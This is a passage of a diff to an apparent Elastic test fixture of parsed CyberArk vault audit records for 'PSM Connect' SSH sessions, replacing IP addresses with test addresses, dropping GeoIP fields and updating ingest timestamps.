\u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:50:43\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:50:43Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -1031,13 +933,13 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "47747796-03e1-4a11-af39-ab56c00e7732", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -1049,9 +951,9 @@ "reset_immediately": "ReconcileTask", "last_task": "ReconcileTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 14 06:50:43", "desc": "PSM Connect" @@ -1062,8 +964,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936285100Z", - "original": "\u003c5\u003e1 2021-03-14T13:50:43Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:50:43\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:50:43Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:50:43\",\"IsoTimestamp\":\"2021-03-14T13:50:43Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331178100Z", + "original": "\u003c5\u003e1 2021-03-14T13:50:43Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:50:43\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:50:43Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:50:43\",\"IsoTimestamp\":\"2021-03-14T13:50:43Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -1086,39 +988,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1135,7 +1016,7 @@ }, "@timestamp": "2021-03-15T10:31:56.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -1146,16 +1027,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:31:56Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:31:56\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:31:56Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:31:56\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:31:56Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -1167,13 +1047,13 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "29f340df-89e9-405a-beae-0216390cda42", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", @@ -1183,9 +1063,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 15 03:31:56", "desc": "PSM Connect" @@ -1196,8 +1076,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936287500Z", - "original": "\u003c5\u003e1 2021-03-15T10:31:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:31:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:31:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:31:56\",\"IsoTimestamp\":\"2021-03-15T10:31:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331182700Z", + "original": "\u003c5\u003e1 2021-03-15T10:31:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n 